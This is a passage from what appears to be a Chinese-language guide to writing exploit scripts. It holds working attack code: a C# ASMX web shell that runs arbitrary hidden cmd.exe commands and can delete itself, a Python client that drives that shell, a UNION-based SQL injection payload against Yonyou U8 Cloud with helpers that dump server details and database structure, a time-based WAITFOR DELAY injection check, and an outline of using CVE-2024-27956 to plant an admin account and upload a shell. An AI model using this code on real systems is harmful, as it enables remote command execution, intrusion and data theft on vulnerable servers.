        if (command == "deleteSelf")
        {
            string filePath = System.Reflection.Assembly.GetExecutingAssembly().Location;
            ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", $"/C timeout /T 2 /NOBREAK & Del /F \"{filePath}\"");
            psi.WindowStyle = ProcessWindowStyle.Hidden;
            psi.CreateNoWindow = true;
            Process.Start(psi);
            System.Web.HttpContext.Current.ApplicationInstance.CompleteRequest();
            return "Web service will be deleted immediately.";
        }
        Process oci = new Process();
        oci.StartInfo.FileName = "cmd.exe";
        oci.StartInfo.RedirectStandardOutput = true;
        oci.StartInfo.UseShellExecute = false;
        oci.StartInfo.Arguments = "/c " + command;
        oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        oci.Start();
        StreamReader txt = oci.StandardOutput;
        string alltxt = txt.ReadToEnd();
        txt.Close();
        txt.Dispose();
        oci.Dispose();
        return alltxt;
    }
}
def exec(self, param):
    try:
        url = self.url.rstrip('/') + f'/spool/1/{shell_name}.asmx/Cmdshell'
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36",
            "Accept-Encoding": "gzip, deflate, br", "Accept": "*/*", "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded", "SOAPAction": "\"http://tempuri.org/UploadData\""}
        burp0_data = {"command": param}
        res = requests.post(url, headers=burp0_headers, data=burp0_data)
        result = get_re_str(r'<string xmlns="http://tempuri.org/">(.*)</string>',res.text)
        logger.info(f'target {self.url} => {param} => {result}')
        return result
    except Exception as e:
        pass
    return ''

SQL注入

有回显

漏洞检测

通过输出特殊字符串或者 MD5 来判断( 和命令执行相同 )

image-20240826180418782

写一个 exec_sql 用于执行给定的 SQL 语句。

漏洞利用

  1. 插入后台用户 GetShell => CVE-2024-27956 WP-Automatic Plugin SQL 注入漏洞( 插入管理员账号,登录上传带有 shell 的插件 )
  2. 正常的获取数据库结构
  3. 有返回长度限制的,一个一个查 => Saber 企业级开发平台 menu/list SQL注入
  4. 没有的,直接 group_concat

示例

用友 U8 Cloud approveservlet SQL 注入漏洞

SQL Server 的数据库第一次遇到

UNION 联合注入类型:

def exec_sql(self, payload):
    try:
        url = self.url.rstrip('/') + '/service/approveservlet'
        headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }
        data = {
            "BILLID": f"1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,({payload}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WPWZ",
            "BILLTYPE": "4331",
            "USERID": "3",
            "RESULT": "4",
            "DATASOURCE": "U8cloud"
        }
        res = requests.post(url, data=data, headers=headers, verify=False)
        if '&apos;' in res.text:
            result = res.text.split('&apos;')[1].split('&apos;')[0]
            logger.info(
                {
                    'url': self.url,
                    'payload': payload,
                    'result': result,
                }
            )
            return result
    except Exception as e:
        pass
    return ''

数据库基本信息:

def get_db_base_info(self) -> dict:
    info = {}
    try:
        version = self.exec_sql("select @@version")
        if version:
            info["version"] = version
        servername = self.exec_sql("select @@servername")
        if servername:
            info["servername"] = servername
        host_name = self.exec_sql("select host_name()")
        if host_name:
            info["host_name"] = host_name
        db_name = self.exec_sql("select db_name()")
        if db_name:
            info["db_name"] = db_name
        user_name = self.exec_sql("select user_name()")
        if user_name:
            info["user_name"] = user_name
    except Exception as e:
        pass
    return info

数据库结构:

因为是 UNION 的查出来的也就是单个的字段显示,而 SQL Server 版本低,不能使用拼接函数,所有通过 FOR XML PATH 拼接结果为字符串。

def get_db_info(self) -> list:
    """
    获取数据库结构 => 列名没取
    :return:
    """
    info = []
    try:
        database_str = self.exec_sql("SELECT STUFF((SELECT ', ' + name FROM sys.databases FOR XML PATH('')), 1, 2, '')")
        for db_name in database_str.split(','):
            db_name = db_name.replace(' ','')
            if db_name in ['master', 'tempdb', 'model', 'msdb']:
                continue
            table_names = self.exec_sql(f"""SELECT STUFF((SELECT TOP 100  ', ' + name FROM {db_name}.sys.tables WHERE type = 'U' AND is_ms_shipped = 0 FOR XML PATH('')), 1, 2, '')""")
            for table_name in table_names.split(','):
                table_name = table_name.replace(' ','')
                col_str = self.exec_sql(f"""SELECT STUFF((SELECT TOP 100  ', ' + COLUMN_NAME FROM {db_name}.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '{table_name}' FOR XML PATH('')), 1, 2, '')""")
                info.append(
                    {"db_name": db_name, "table_name": table_name, "columns": col_str}
                )
    except Exception as e:
        pass
    return info

无回显

延时注入

def check(self):
    try:
        # 获取正常响应的时间
        url = self.url.rstrip('/') + "/kp/PreviewKPQT.jsp?KPQTID=1"
        res = requests.get(url, verify=False)
        if res.status_code != 200:
            return False
        normal_elapsed = res.elapsed.total_seconds()
        # 随机生成一个时间 20 ~ 30s
        timeout = random.randint(20, 30)
        url = self.url.rstrip('/') + "/kp/PreviewKPQT.jsp?KPQTID=1';WAITFOR DELAY '0:0:{}'--".format(timeout)
        res = requests.get(url, verify=False, timeout=60)
        # 延时注入后的时间 > 延时时间 > 正常请求
        if res.status_code == 200 and '填表日期' in res.text and res.elapsed.total_seconds() > timeout > normal_elapsed:
            logger.info({
                'url': self.url,
                '正常响应': f'{normal_elapsed}s',
                '等待时间': f'{timeout}s',
                '注入响应': f'{res.elapsed.total_seconds()}s',
            })
            return {
                '正常响应': f'{normal_elapsed}s',
                '等待时间': f'{timeout}s',
                '注入响应': f'{res.elapsed.total_seconds()}s',
            }
    except Exception as e:
        pass
    return False